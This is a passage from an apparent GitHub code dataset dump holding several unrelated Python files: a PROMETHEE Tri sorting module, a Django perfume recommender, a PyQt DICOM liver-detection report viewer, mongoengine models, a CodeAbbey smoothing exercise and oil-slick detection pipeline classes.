pd.DataFrame with alternatives as index and profiles as columns\n \"\"\"\n\n deviations = 
pd.DataFrame(columns=profiles_criteria_net_flows.index,\n index=alternatives, dtype=float)\n\n for alternative, alternative_row in \\\n alternatives_criteria_net_flows.iterrows():\n for profile, profile_row in profiles_criteria_net_flows.iterrows():\n # Check if deviations should be calculated as absolute values\n if use_marginal_value:\n deviations.loc[alternative, profile] = (\n criteria_weights *\n abs(alternative_row - profile_row)).sum()\n else:\n deviations.loc[alternative, profile] = (criteria_weights * (\n alternative_row - profile_row)).sum()\n\n return deviations\n\n\ndef _assign_alternatives_to_classes_with_minimal_deviation(\n categories: List[str],\n alternatives: List[str], deviations: pd.DataFrame,\n assign_to_better_class: bool = True) -> pd.Series:\n \"\"\"\n This function assigns every alternative to class with minimal deviation\n for pair alternative, class.\n\n :param categories: List with categories names as strings\n :param alternatives: List with alternatives names as strings\n :param deviations: pd.DataFrame with alternatives as index and profiles\n as columns\n :param assign_to_better_class: Boolean which describe preference of\n the DM in final alternative assignment if total distance is equal\n cut_point value.\n\n :return: pd.Series with assignments as values\n \"\"\"\n classification = pd.Series(index=alternatives, dtype=str)\n for alternative, alternative_row in deviations.iterrows():\n if assign_to_better_class:\n classification[alternative] = categories[alternative_row.argmin()]\n else:\n classification[alternative] = categories[\n alternative_row[::-1].argmin()]\n\n return classification\n\n\ndef calculate_prometheetri_sorted_alternatives(\n categories: List[str],\n criteria_weights: pd.Series,\n alternatives_partial_preferences: Tuple[pd.DataFrame, pd.DataFrame],\n profiles_partial_preferences: pd.DataFrame,\n assign_to_better_class: bool = True,\n use_marginal_value: bool = True) -> pd.Series:\n \"\"\"\n This function sorts alternatives to proper categories\n (based on Promethee Tri).\n\n :param categories: List with categories names as strings\n :param criteria_weights: pd.Series with criterion name as index and weight\n of each criterion as values\n :param alternatives_partial_preferences: Tuple with pd.DataFrame with\n alternatives names as index and profiles names as columns and pd.DataFrame\n objects with profiles names as index and alternatives names as columns\n :param profiles_partial_preferences: pd.DataFrame with profiles names as\n index and profiles names as columns\n :param assign_to_better_class: Boolean which describe preference of\n the DM in final alternative assignment if total distance is equal\n cut_point value.\n :param use_marginal_value: Boolean which describe whether deviation \n should be calculated as absolute value or not\n\n :return: pd.Series with assignments as values\n \"\"\"\n promethee_tri_validation(categories, criteria_weights,\n alternatives_partial_preferences,\n profiles_partial_preferences,\n assign_to_better_class, use_marginal_value)\n\n alternatives = alternatives_partial_preferences[1].columns.tolist()\n\n profiles_criteria_net_flows, alternatives_criteria_net_flows = \\\n _calculate_criteria_net_flows(alternatives_partial_preferences,\n profiles_partial_preferences)\n\n deviations = _calculate_deviations(alternatives, criteria_weights,\n profiles_criteria_net_flows,\n alternatives_criteria_net_flows,\n use_marginal_value)\n\n return _assign_alternatives_to_classes_with_minimal_deviation(\n categories, 
alternatives, deviations, assign_to_better_class)\n","repo_name":"WAndraszyk/Construct-your-own-PROMETHEE-with-Python-for-MCDA","sub_path":"modular_parts/sorting/M19_PrometheeTri.py","file_name":"M19_PrometheeTri.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"22548437338","text":"import shelve\n\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import Puntuacion, Perfume, Usuario\nfrom .forms import PerfumeForm\nfrom .populate import populateDatabase\nfrom .recommendations import transformPrefs, calculateSimilarItems, getRecommendations\n\n\ndef recommendedPerfumes(request):\n if request.method == 'POST':\n form = PerfumeForm(request.POST)\n if form.is_valid():\n idPerfume = form.cleaned_data['id']\n perfume = get_object_or_404(Perfume, pk=idPerfume)\n shelf = shelve.open(\"dataRS.dat\")\n Prefs = shelf['ItemsPrefs']\n shelf.close()\n rankings = getRecommendations(Prefs,int(idPerfume))\n recommended = rankings[:3]\n perfumes = []\n scores = []\n for re in recommended:\n perfumes.append(Usuario.objects.get(pk=re[1]))\n scores.append(re[0])\n items = zip(perfumes, scores)\n return render(request, 'recommendationPerfumes.html', {'perfume': perfume, 'items': items})\n else:\n form = PerfumeForm()\n return render(request, 'search_perfume.html', {'form': form})\n\ndef loadDict():\n Prefs = {} # matriz de usuarios y puntuaciones a cada a items\n shelf = shelve.open(\"dataRS.dat\")\n ratings = Puntuacion.objects.all()\n for ra in ratings:\n user = int(ra.usuario_id.id)\n itemid = int(ra.perfume_id.id)\n rating = float(ra.puntuacion)\n Prefs.setdefault(user, {})\n Prefs[user][itemid] = rating\n shelf['Prefs'] = Prefs\n shelf['ItemsPrefs'] = transformPrefs(Prefs)\n shelf['SimItems'] = calculateSimilarItems(Prefs, n=10)\n shelf.close()\n\n\n# CONJUNTO DE VISTAS\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef populateDB(request):\n populateDatabase()\n return render(request, 'populate.html')\n\n\ndef loadRS(request):\n loadDict()\n return render(request, 'loadRS.html')\n","repo_name":"arh09/django_bs4_rs","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10797454788","text":"import os\nimport numpy as np\nimport natsort\nimport ctypes\nimport glob\n\nfrom threading import Thread\nfrom PIL import Image, UnidentifiedImageError\nfrom PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QPushButton, QHBoxLayout, QLabel, QGridLayout, \\\n QTextEdit, QTableWidget\nfrom PyQt5.QtGui import QPixmap, QIcon, QColor\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import uic\nfrom pydicom import read_file, dcmread\nfrom fpdf import FPDF\nfrom History import History\nfrom random import randint\n\n# importing libraries\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n\ndef read_dicom_series(directory, filepattern=\"image_*\", target_list=None):\n \"\"\" Reads a DICOM Series files in the given directory.\n Only filesnames matching filepattern will be considered\"\"\"\n\n if not os.path.exists(directory) or not os.path.isdir(directory):\n raise ValueError(\"Given directory does not exist or is a file : \" + str(directory))\n print('\\tRead Dicom', directory)\n lstFilesDCM = natsort.natsorted(glob.glob(os.path.join(directory, filepattern)))\n print('\\tLength dicom series', len(lstFilesDCM))\n # Get ref file\n 
RefDs = read_file(lstFilesDCM[0])\n # Load dimensions based on the number of rows, columns, and slices (along the Z axis)\n ConstPixelDims = (int(RefDs.Rows), int(RefDs.Columns), len(lstFilesDCM))\n # The array is sized based on 'ConstPixelDims'\n ArrayDicom = np.zeros(ConstPixelDims, dtype=RefDs.pixel_array.dtype)\n dicom_files = []\n # loop through all the DICOM files\n for filenameDCM in lstFilesDCM:\n # read the file\n ds = dcmread(filenameDCM)\n # store the raw image data\n ArrayDicom[:, :, lstFilesDCM.index(filenameDCM)] = ds.pixel_array\n dicom_files.append(ds)\n target_list.append(ds)\n\n return target_list\n\n\ndef dicom_date_to_str(date):\n year = date[0:4]\n month = date[4:6]\n day = date[6:8]\n return f\"{year}-{month}-{day}\"\n\n\ndef dicom_to_png(dicom_image, path, filename):\n img = dicom_image.pixel_array.astype(float) # get image array\n scaled_image = (np.maximum(img, 0) / img.max()) * 255.0\n scaled_image = np.uint8(scaled_image)\n final_image = Image.fromarray(scaled_image)\n # final_image.show()\n try:\n final_image.save(f\"{path}/{filename}.png\")\n except (FileNotFoundError, UnidentifiedImageError):\n print(\"Something went wrong while writing image. Check your filename and path\")\n return final_image\n\n\ndef read_dicom(mask_path, patient_path, patient_filepattern, mask_filepattern):\n patient_files = []\n mask_files = []\n t1 = Thread(target=read_dicom_series, args=[patient_path, patient_filepattern, patient_files])\n t2 = Thread(target=read_dicom_series, args=[mask_path, mask_filepattern, mask_files])\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n return patient_files, mask_files\n\n\n# TODO: 1- add copy to clipboard button (checked)\n# 2- add buttons functionality for history, home, save\nclass OutputWindow:\n def __init__(self, mask_path, patient_path, patient_filepattern, mask_filepattern, output_folder):\n user32 = ctypes.windll.user32\n screensize = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)\n self.title = \"Report\"\n self.width = screensize[0]\n self.height = screensize[1]\n self.app = QApplication([])\n self.window = QWidget()\n self.window.setWindowTitle(\"Detection\")\n self.window.setWindowIcon(QIcon(\"assets/logo.png\"))\n self.images = read_dicom(mask_path, patient_path, patient_filepattern, mask_filepattern)\n self.patient_dicom = self.images[0]\n self.dicom_image_index = randint(0, len(self.patient_dicom)-1)\n self.mask_dicom = self.images[1]\n self.output_folder = output_folder\n self.hs = None\n\n def create_window(self):\n self.window = QWidget()\n self.window.setWindowTitle(\"Detection\")\n self.add_layout()\n self.window.showMaximized()\n self.window.show()\n self.app.exec_()\n\n def goto_history(self):\n if not self.hs:\n self.hs = History()\n self.hs.show()\n self.window.close()\n\n def close(self):\n self.window.deleteLater()\n self.window.close()\n\n def add_layout(self):\n # Top Bar Layout\n container = QWidget()\n navbar_layout = QHBoxLayout(container)\n home_button = QPushButton('')\n home_icon = QIcon(\"assets/home.png\")\n home_button.setIcon(home_icon)\n home_button.setFlat(True)\n navbar_layout.addWidget(home_button)\n history_button = QPushButton()\n history_icon = QIcon(\"assets/history.png\")\n history_button.setIcon(history_icon)\n history_button.setFlat(True)\n history_button.clicked.connect(self.goto_history)\n navbar_layout.addWidget(history_button)\n save_button = QPushButton()\n save_icon = QIcon(\"assets/save.png\")\n save_button.setIcon(save_icon)\n save_button.setFlat(True)\n\n 
navbar_layout.addWidget(save_button)\n exit_button = QPushButton()\n exit_icon = QIcon(\"assets/log-out.png\")\n exit_button.setIcon(exit_icon)\n exit_button.setFlat(True)\n exit_button.clicked.connect(self.close)\n navbar_layout.addWidget(exit_button)\n container.setStyleSheet(\"background-color: grey;\")\n main_navbar_layout = QVBoxLayout()\n main_navbar_layout.addWidget(container)\n self.dicom_image_index = randint(0, len(self.patient_dicom)-1)\n pat_dicom_img = self.patient_dicom[self.dicom_image_index]\n patient_id = pat_dicom_img.data_element(\"PatientID\").value\n patient_name = pat_dicom_img.data_element('PatientName').value\n # Dicom Viewer Section\n dicom_viewer_layout = QVBoxLayout()\n dicom_viewer_layout.addWidget(QLabel(\"Dicom Preview\"))\n dicom_images_widget = QWidget()\n dicom_images_widget.setStyleSheet(\"background-color: grey;\")\n dicom_images_layout = QVBoxLayout(dicom_images_widget)\n dicom_to_png(pat_dicom_img, \"temp/images\", patient_name)\n pat_image_label = QLabel()\n pat_image = QPixmap(f\"temp/images/{patient_name}.png\")\n pat_image_label.setPixmap(pat_image)\n dicom_images_layout.addWidget(pat_image_label)\n # - model result\n mask_image_label = QLabel()\n index = randint(0, len(self.mask_dicom)-1)\n mask_dicom_img = self.mask_dicom[index]\n dicom_to_png(mask_dicom_img, \"temp/images\", f\"{patient_name}_mask\")\n\n mask_image = QPixmap(f\"temp/images/{patient_name}_mask.png\")\n mask_image_label.setPixmap(mask_image)\n mask_image_label.clear()\n mask_image_label.setPixmap(mask_image)\n dicom_images_layout.addWidget(mask_image_label)\n dicom_viewer_layout.addWidget(dicom_images_widget)\n image_nav_layout = QHBoxLayout()\n prev_button = QPushButton()\n prev_icon = QIcon(\"assets/left-arrow.png\")\n prev_button.setIcon(prev_icon)\n image_nav_layout.addWidget(prev_button)\n gallery_info_label = QLabel(\"1 of 20\")\n gallery_info_label.setAlignment(Qt.AlignCenter)\n image_nav_layout.addWidget(gallery_info_label)\n next_button = QPushButton()\n next_icon = QIcon(\"assets/right-arrow.png\")\n next_button.setIcon(next_icon)\n image_nav_layout.addWidget(next_button)\n dicom_viewer_layout.addLayout(image_nav_layout)\n # Report Section\n report_layout = QVBoxLayout()\n report_layout.addWidget(QLabel(\"Report\"))\n # - patient details\n patient_details_layout = QGridLayout()\n patient_details_layout.addWidget(QLabel(\"Patient Details\"), 0, 0)\n patient_name_layout = QHBoxLayout()\n patient_name_layout.addWidget(QLabel(\"Patient Name\"))\n pat_name_text = QTextEdit(str(pat_dicom_img.data_element(\"PatientName\").value))\n pat_name_text.setFixedWidth(1200)\n pat_name_text.setAlignment(Qt.AlignLeft)\n pat_name_text.setFixedHeight(30)\n patient_name_layout.addWidget(pat_name_text)\n patient_details_layout.addLayout(patient_name_layout, 1, 0)\n patient_id_layout = QHBoxLayout()\n patient_id_layout.addWidget(QLabel(\"Patient ID\"))\n pat_id_text = QTextEdit(str(patient_id))\n pat_id_text.setFixedHeight(30)\n pat_id_text.setFixedWidth(1200)\n pat_id_text.setAlignment(Qt.AlignLeft)\n patient_id_layout.addWidget(pat_id_text)\n patient_details_layout.addLayout(patient_id_layout, 2, 0)\n pat_date_layout = QHBoxLayout()\n pat_date_layout.addWidget(QLabel(\"Birth Date\"))\n birth_date = dicom_date_to_str(pat_dicom_img.data_element(\"PatientBirthDate\").value)\n pat_date_text = QTextEdit(str(birth_date))\n pat_date_text.setFixedHeight(30)\n pat_date_text.setFixedWidth(1200)\n pat_date_text.setAlignment(Qt.AlignLeft)\n pat_date_layout.addWidget(pat_date_text)\n 
patient_details_layout.addLayout(pat_date_layout, 3, 0)\n study_date_layout = QHBoxLayout()\n study_date_layout.addWidget(QLabel(\"Study Date\"))\n study_date = dicom_date_to_str(pat_dicom_img.data_element(\"StudyDate\").value)\n study_date_text = QTextEdit(str(study_date))\n study_date_text.setFixedHeight(30)\n study_date_text.setFixedWidth(1200)\n study_date_text.setAlignment(Qt.AlignLeft)\n study_date_layout.addWidget(study_date_text)\n patient_details_layout.addLayout(study_date_layout, 4, 0)\n report_layout.addLayout(patient_details_layout)\n # - detection details\n detection_layout = QVBoxLayout()\n detection_header_layout = QHBoxLayout()\n detection_header_layout.addWidget(QLabel(\"Detection\"))\n cp_button = QPushButton()\n cp_icon = QIcon(\"assets/copy.png\")\n cp_button.setIcon(cp_icon)\n cp_button.setFlat(True)\n detection_header_layout.addWidget(cp_button)\n detection_layout.addLayout(detection_header_layout)\n # - model result\n detection = \"1- A tumor has been detected in liver.
2- A tumor has been detected in liver.

\" \\\n \"Summary:
Liver has two tumors.\"\n detection_text = QTextEdit(detection)\n detection_text.setFixedHeight(100)\n detection_layout.addWidget(detection_text)\n report_layout.addLayout(detection_layout)\n # - status\n status_layout = QVBoxLayout()\n status_layout_label = QHBoxLayout()\n status_layout_label.addWidget(QLabel(\"Status\"))\n status_image_label = QLabel()\n status_image = QPixmap(\"assets/red_circle.png\")\n status_image_label.setPixmap(status_image)\n status_layout_label.addWidget(status_image_label)\n cp_button = QPushButton()\n cp_icon = QIcon(\"assets/copy.png\")\n cp_button.setIcon(cp_icon)\n cp_button.setFlat(True)\n status_layout_label.addWidget(cp_button)\n status_layout.addLayout(status_layout_label)\n status = \"Abnormal\"\n status_text = QTextEdit(status)\n status_text.setFixedHeight(100)\n status_layout.addWidget(status_text)\n report_layout.addLayout(status_layout)\n\n save_button.clicked.connect(\n lambda: self.save(patient_name, patient_id, {\"Study Date\": study_date,\n \"Birth Date\": birth_date}))\n # Main layout of the window\n main_layout = QVBoxLayout()\n bottom_layout = QHBoxLayout()\n bottom_layout.addLayout(dicom_viewer_layout)\n bottom_layout.addLayout(patient_details_layout)\n bottom_layout.addLayout(report_layout)\n main_layout.addLayout(main_navbar_layout)\n main_layout.addLayout(bottom_layout)\n main_layout.addLayout(report_layout)\n self.window.setLayout(main_layout)\n\n def save(self, patient_name, patient_id, details: dict):\n pdf = FPDF()\n pdf.add_page()\n pdf.set_font(\"Arial\", size=15)\n\n pdf.cell(200, 10, txt=\"Detection Result\", ln=1, align='C')\n pdf.cell(200, 10, txt=f\"Patient Name: {patient_name}\", ln=2, align='C')\n pdf.cell(200, 10, txt=f\"Patient ID: {patient_id}\", ln=3, align='C')\n ln_c = 4\n for cell in details.keys():\n pdf.cell(200, 5, txt=f\"{cell}: {details[cell]}\", ln=ln_c, align='C')\n ln_c += 1\n pdf.cell(200, 5, txt=f\"\", ln=ln_c, align='C')\n pdf.image(name=\"temp/images/liver_17^patient_mask.png\")\n pdf.output(dest='F', name=f\"{self.output_folder}{patient_name}_{patient_id}.pdf\")\n\n @staticmethod\n def preview_dicom(pat_dicom_img, mask_dicom_img, patient_name):\n # Dicom Viewer Section\n dicom_viewer_layout = QVBoxLayout()\n dicom_viewer_layout.addWidget(QLabel(\"Dicom Preview\"))\n dicom_images_widget = QWidget()\n dicom_images_widget.setStyleSheet(\"background-color: grey;\")\n dicom_images_layout = QVBoxLayout(dicom_images_widget)\n dicom_to_png(pat_dicom_img, \"temp/images\", patient_name)\n pat_image_label = QLabel()\n pat_image = QPixmap(f\"temp/images/{patient_name}.png\")\n pat_image_label.setPixmap(pat_image)\n dicom_images_layout.addWidget(pat_image_label)\n # - model result\n mask_image_label = QLabel()\n dicom_to_png(mask_dicom_img, \"temp/images\", f\"{patient_name}_mask\")\n mask_image = QPixmap(f\"temp/images/{pat_dicom_img.data_element('PatientName').value}_mask.png\")\n mask_image_label.setPixmap(mask_image)\n dicom_images_layout.addWidget(mask_image_label)\n dicom_viewer_layout.addWidget(dicom_images_widget)\n\n @staticmethod\n def set_item_background(item, grade):\n if grade > 1:\n item.setBackground(QColor(255, 0, 0))\n elif grade == 1:\n item.setBackground(QColor(255, 255, 0))\n else:\n item.setBackground(QColor(0, 255, 0))\n\n @staticmethod\n def set_widget_background(item, grade):\n if grade > 1:\n item.setStyleSheet(\"background-color: red;\")\n elif grade == 1:\n item.setStyleSheet(\"background-color: rgb(255, 255, 0);\")\n else:\n item.setStyleSheet(\"background-color: rgb(0, 255, 0);\")\n\n\n# 
script to be written when user clicks start\nif __name__ == \"__main__\":\n ow = OutputWindow(\"C:\\\\Users\\\\rasta\\\\Downloads\\\\Compressed\\\\3Dircadb1.17\\\\3Dircadb1.17\\\\MASKS_DICOM\\\\liver\",\n # \"C:\\\\Users\\\\rasta\\\\Downloads\\\\Compressed\\\\3Dircadb1.17\\\\3Dircadb1.17\\\\PATIENT_DICOM\",\n \"C:\\\\Users\\\\rasta\\\\Downloads\\\\liver 6\\\\liver 6\\\\^95020329_20210906\",\n \"FILE*\", \"image_*\", \"test/output_folder/\")\n ow.create_window()\n","repo_name":"alireza-da/TraumaDetectionProject","sub_path":"src/visualize_output_v2.py","file_name":"visualize_output_v2.py","file_ext":"py","file_size_in_byte":14761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34279917385","text":"import json\nfrom bson import json_util\nimport datetime\nfrom mongoengine import Document, EmbeddedDocument, connect\nfrom mongoengine import StringField, ReferenceField, ListField, URLField, EmbeddedDocumentField, EmbeddedDocumentListField, DictField, BooleanField, IntField, DateTimeField\n\n\nclass DogData(Document):\n owner_name = StringField(default='', required=True)\n dog_name = StringField(default='', required=True)\n dog_id = IntField(default=0, required=True, unique=True)\n\n def to_json(self):\n jsonObj = {}\n jsonObj[\"owner_name\"] = self.owner_name\n jsonObj[\"dog_name\"] = self.dog_name\n jsonObj[\"dog_id\"] = self.dog_id\n return jsonObj\n\n\nclass Record(Document):\n dog_data = ReferenceField(DogData, required=True)\n classify_data = ListField(DictField(), default=[])\n image_path = StringField(default='', required=True)\n timestamp = DateTimeField(required=True, default=datetime.datetime.now)\n\n def to_json(self):\n jsonObj = {}\n jsonObj[\"dog_data\"] = self.dog_data.to_json()\n jsonObj[\"classify_data\"] = self.classify_data or []\n jsonObj[\"image_path\"] = self.image_path\n jsonObj[\"timestamp\"] = self.timestamp.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return jsonObj\n","repo_name":"kongyay/DogBloodWeb","sub_path":"server_dog/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14633558730","text":"\"\"\"\nSmoothing the Weather\nProblem #57\nhttp://www.codeabbey.com/index/task_view/smoothing-the-weather\n\nLittle Merlin wants to become a meteorologist. He measures the temperature of the air each hour so that after several days he has a long sequence of values.\n\nHowever, his instruments are not ideal so the measurements are not exact - they randomly jump up and down by several degrees from the real values.\n\nObserving this, Merlin decided to make his data more smooth. To achieve this he only needs every value to be substituted by the average of it and its two neighbors. For example, if he have the sequence of 5 values like this:\n\n3 5 6 4 5\nThen the second (i.e. 5) should be substituted by (3 + 5 + 6) / 3 = 4.66666666667,\nthe third (i.e. 6) should be substituted by (5 + 6 + 4) / 3 = 5,\nthe fourth (i.e. 
4) should be substituted by (6 + 4 + 5) / 3 = 5.\nBy agreement, the first and the last values will remain unchanged.\n\nAt the picture above the blue line shows unprocessed data while red represents the smoothing.\n\nYou are to write the program which helps Little Merlin in this whimsical algorithm of digital signal processing.\n\nInput data will contain the length of the sequence in the first line.\nThe second line will contain the measurements itself.\nAnswer should contain the processed sequence. All values should be calculated to precision of 1e-7 or better.\n\"\"\"\ncount = int(input())\n\nnums = input().split()\n\nnums = [float(x) for x in nums]\n\nsmoothed = []\n\nfor k,v in enumerate(nums):\n if k is 0 or k is len(nums)-1:\n smoothed.append(v)\n else:\n a = v\n b = nums[k-1]\n c = nums[k+1]\n smoothed.append((a + b + c)/3)\n\nsmoothed = [str(x) for x in smoothed]\n\nprint(' '.join(smoothed))","repo_name":"jason-ellis/codeabbey","sub_path":"python3/057.py","file_name":"057.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"8142069562","text":"import xmltodict\nfrom configs import server_config, ml_config, path_config\nimport json\nimport requests\nimport shutil\nfrom subprocess import run\nfrom pathlib import Path\nfrom errors import MissingProductError\nfrom utils.common import ( # pylint: disable=no-name-in-module\n xml_get,\n clear,\n to_standard_datetime_str,\n)\nfrom utils.s3 import s3copy # pylint: disable=no-name-in-module\nfrom alchemy import (\n Sns,\n Grd,\n Ocn,\n Inference,\n Posi_Poly,\n Vessel,\n Coincident,\n Slick,\n Eez,\n)\nfrom ml.raster_processing import resize\nfrom ml.vector_processing import geojson_to_ewkt, shape_to_ewkt, wk_to_shapely\nimport shapely.geometry as sh\n\n\nclass Sns_Ext(Sns):\n def __init__(self, raw):\n # DB Columns\n self.messageid = raw[\"MessageId\"]\n self.subject = raw[\"Subject\"]\n self.timestamp = raw[\"Timestamp\"]\n\n # Calculated\n self.raw = raw\n self.message = json.loads(raw[\"Message\"])\n\n\nclass Grd_Ext(Grd):\n def __init__(self, sns):\n # DB Columns\n self.sns = sns\n self.pid = sns.message[\"id\"]\n self.uuid = sns.message[\"sciHubId\"]\n self.absoluteorbitnumber = sns.message[\"absoluteOrbitNumber\"]\n self.polarization = sns.message[\"polarization\"]\n self.mode = sns.message[\"mode\"]\n self.s3ingestion = sns.message[\"s3Ingestion\"]\n self.scihubingestion = sns.message[\"sciHubIngestion\"]\n self.starttime = sns.message[\"startTime\"]\n self.stoptime = sns.message[\"stopTime\"]\n self.geometry = geojson_to_ewkt(sns.message[\"footprint\"])\n\n # Calculated\n self.sns_msg = sns.message\n self.s3_dir = f\"s3://sentinel-s1-l1c/{self.sns_msg['path']}/measurement/\"\n self.load_from_field = \"pid\"\n\n # Placeholders\n self.filepath = None\n\n def download_grd_tiff(self, dest_dir=None):\n \"\"\"Creates a local directory and downloads a GeoTiff (often ~700MB)\n \"\"\"\n if server_config.VERBOSE:\n print(\"Downloading GRD\")\n\n dest_dir = (\n Path(dest_dir)\n if dest_dir\n else Path(path_config.LOCAL_DIR) / \"temp\" / self.pid\n )\n self.file_path = dest_dir / f\"{self.sns_msg['mode'].lower()}-vv.tiff\"\n s3copy(self.file_path.name, self.s3_dir, dest_dir)\n self.is_downloaded = True\n return self.file_path\n\n def cleanup(self):\n \"\"\"Delete any local directory made to store the GRD\n \"\"\"\n if self.file_path.parent.exists():\n shutil.rmtree(self.file_path.parent)\n\n\nclass Ocn_Ext(Ocn):\n def __init__(self, grd, 
ocn_xml):\n # DB Columns\n self.grd = grd\n self.pid = ocn_xml.get(\"title\")\n self.uuid = ocn_xml.get(\"id\")\n self.summary = ocn_xml.get(\"summary\")\n self.producttype = xml_get(ocn_xml.get(\"str\"), \"producttype\")\n self.filename = xml_get(ocn_xml.get(\"str\"), \"filename\")\n\n # Calculated\n self.file_path = None\n\n\nclass Inference_Ext(Inference):\n def __init__(\n self,\n grd,\n ocn=None,\n ml_pkls=ml_config.ML_PKL_LIST,\n thresholds=ml_config.ML_THRESHOLDS,\n fine_pkl_idx=-1,\n chip_size_orig=ml_config.CHIP_SIZE_ORIG,\n chip_size_reduced=ml_config.CHIP_SIZE_REDUCED,\n overhang=ml_config.OVERHANG,\n use_ocn=ml_config.USE_OCN,\n geom_path=None,\n ):\n # DB Columns\n self.grd = grd\n self.ocn = ocn\n self.ml_pkls = ml_pkls\n self.thresholds = thresholds\n self.fine_pkl_idx = fine_pkl_idx\n self.chip_size_orig = chip_size_orig\n self.chip_size_reduced = chip_size_reduced\n self.overhang = overhang\n\n # Calculated\n self.polys = [] # Shapely Objects\n self.posi_polys = [] # SQLAlchemy objects\n self.grd_path = grd.file_path\n self.prod_id = grd.pid\n self.geom_path = geom_path or self.grd_path.with_name(\n f\"slick_{'-'.join([str(t) for t in self.thresholds])}conf.geojson\"\n )\n self.use_ocn = use_ocn\n\n def save_small_to_s3(self, pct=0.25):\n small_path = self.grd_path.with_name(\"small.tiff\")\n resize(self.grd_path, small_path, pct)\n s3_raster_path = f\"s3://skytruth-cerulean/outputs/rasters/{self.prod_id}.tiff\"\n cmd = f\"aws s3 cp {small_path} {s3_raster_path}\"\n run(cmd, shell=True)\n clear(small_path)\n\n def save_poly_to_s3(self):\n s3_vector_path = (\n f\"s3://skytruth-cerulean/outputs/vectors/{self.prod_id}.geojson\"\n )\n cmd = f\"aws s3 cp {self.geom_path} {s3_vector_path}\"\n run(cmd, shell=True)\n\n\nclass Posi_Poly_Ext(Posi_Poly):\n def __init__(self, inf=None, geoshape=None, slick=None, from_obj=None):\n if from_obj:\n self.inference = from_obj.inference\n self.slick = from_obj.slick\n self.geometry = from_obj.geometry\n else:\n # DB Columns\n self.inference = inf\n self.slick = slick\n self.geometry = shape_to_ewkt(geoshape)\n\n def calc_eezs(self, sess):\n # XXX This set command isn't working.\n eez_ids = set([e.id for e in self.get_intersecting_objects(sess, Eez)])\n return [Eez_Ext.from_id(e_id, sess) for e_id in eez_ids]\n\n\nclass Vessel_Ext(Vessel):\n def __init__(self, inf, geoshape):\n # DB Columns\n self.inference = inf\n self.geometry = shape_to_ewkt(geoshape)\n\n\nclass Coincident_Ext(Coincident):\n def __init__(self, posi_poly, vessel, input=\"???\"):\n # DB Columns\n self.posi_poly = posi_poly\n self.vessel = vessel\n\n # Placeholders\n self.direct_hits = None\n self.proximity = None\n self.score = None\n self.method = None\n self.destination = None\n self.speed_avg = None\n self.status = None\n self.port_last = None\n self.port_next = None\n self.cargo_type = None\n self.cargo_amount = None\n\n def to_api_dict(self):\n res = {\n \"id\": self.vessel.id,\n \"mmsi\": self.vessel.mmsi,\n \"name\": self.vessel.name,\n \"flag\": self.vessel.flag,\n \"callsign\": self.vessel.callsign,\n \"imo\": self.vessel.imo,\n \"shiptype\": self.vessel.shiptype,\n \"length\": self.vessel.length,\n \"direct_hits\": self.direct_hits,\n \"proximity\": self.proximity,\n \"score\": self.score, # ORDER LIST BY THIS VALUE\n \"method\": self.method,\n \"destination\": self.destination,\n \"speed_avg\": self.speed_avg,\n }\n return res\n\n\nclass Slick_Ext(Slick):\n def __init__(self, posi_polys=[], from_obj=None):\n if from_obj:\n self.posi_polys = [\n 
Posi_Poly_Ext(from_obj=posi_poly) for posi_poly in from_obj.posi_polys\n ]\n else:\n # DB Columns\n self.posi_polys = posi_polys\n\n # Calculated\n self.timestamp = self.calc_timestamp()\n self.geometry = shape_to_ewkt(self.calc_geometry())\n self.coincidents = self.calc_coincidents()\n\n def to_api_dict(\n self, sess\n ): # XXXHELP Should the session just be a global variable?\n res = {\n \"id\": self.id,\n \"timestamp\": to_standard_datetime_str(self.timestamp),\n \"geometry\": self.geometry,\n \"eezs\": [eez.to_api_dict() for eez in self.calc_eezs(sess)],\n \"coincidents\": [\n coincident.to_api_dict() for coincident in self.coincidents\n ],\n }\n return res\n\n def calc_timestamp(self):\n return self.posi_polys[0].inference.grd.starttime\n\n def calc_geometry(self):\n return sh.MultiPolygon(\n [wk_to_shapely(poly.geometry) for poly in self.posi_polys]\n )\n\n def calc_eezs(self, sess):\n eez_ids = []\n for poly in self.posi_polys:\n eez_ids += [e.id for e in poly.calc_eezs(sess)]\n return [Eez_Ext.from_id(e_id, sess) for e_id in set(eez_ids)]\n\n def calc_coincidents(self):\n coincidents = []\n for poly in self.posi_polys:\n coincidents += poly.coincidents\n return coincidents\n\n\nclass Eez_Ext(Eez):\n def to_api_dict(self):\n res = {\n \"id\": self.id,\n \"mrgid\": self.mrgid,\n \"geoname\": self.geoname,\n \"pol_type\": self.pol_type,\n \"sovereigns\": self.sovereigns,\n }\n return res\n\n\nclass SHO:\n \"\"\"A class that organizes information about content stored on SciHub\n \"\"\"\n\n def __init__(self, grd, sess, user=server_config.SH_USER, pwd=server_config.SH_PWD):\n self.prod_id = grd.pid\n self.generic_id = self.prod_id[:7] + \"????_?\" + self.prod_id[13:-4] + \"*\"\n self.URLs = {\n \"query_prods\": f\"https://{user}:{pwd}@scihub.copernicus.eu/apihub/search?q=(platformname:Sentinel-1 AND filename:{self.generic_id})\",\n }\n\n # Placeholders\n self.grd_xml = self.grd_id = self.grd_shid = self.grd_path = None\n self.ocn = self.ocn_xml = None\n\n with requests.Session() as s:\n try:\n p = s.post(self.URLs[\"query_prods\"])\n except requests.exceptions.ConnectionError as e:\n print(\"Error connecting to SciHub\")\n raise e\n self.query_prods_res = xmltodict.parse(p.text)\n\n if 